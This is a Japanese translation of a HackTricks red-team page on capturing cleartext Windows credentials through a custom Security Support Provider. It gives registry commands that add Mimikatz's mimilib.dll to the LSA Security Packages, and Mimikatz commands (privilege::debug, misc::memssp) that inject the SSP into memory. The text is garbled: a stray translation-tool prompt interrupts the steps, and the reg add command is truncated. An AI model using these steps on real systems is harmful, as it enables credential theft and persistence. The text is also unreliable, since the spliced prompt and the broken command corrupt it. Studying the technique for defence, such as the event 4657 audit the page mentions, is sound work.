hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

4.9 KiB
Raw Blame History

AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

カスタムSSP

SSPセキュリティサポートプロバイダとは何かこちらで学ぶ。
マシンへのアクセスに使用されるクレデンシャルクリアテキストキャプチャするために、独自のSSPを作成できます。

Mimilib

Mimikatzによって提供されるmimilib.dllバイナリを使用できます。これは、クリアテキストでのすべてのクレデンシャルをファイル内に記録します。
C:\Windows\System32\にdllをドロップします。
既存のLSAセキュリティパッケージのリストを取得します

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

mimilib.dllをセキュリティサポートプロバイダリスト(セキュリティパッケージ)に追加します:

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

以下は、Windowsの強化に関するハッキング技術についてのハッキング書籍の内容です。関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどの翻訳は行わないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。


そして、再起動後には、C:\Windows\System32\kiwissp.logに平文の資格情報が見つかります。

メモリ内

Mimikatzを使用してこれを直接メモリに注入することもできます少し不安定になったり機能しない可能性があることに注意してください

privilege::debug
misc::memssp

この操作は再起動後には維持されません。

対策

イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の作成/変更を監査

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法: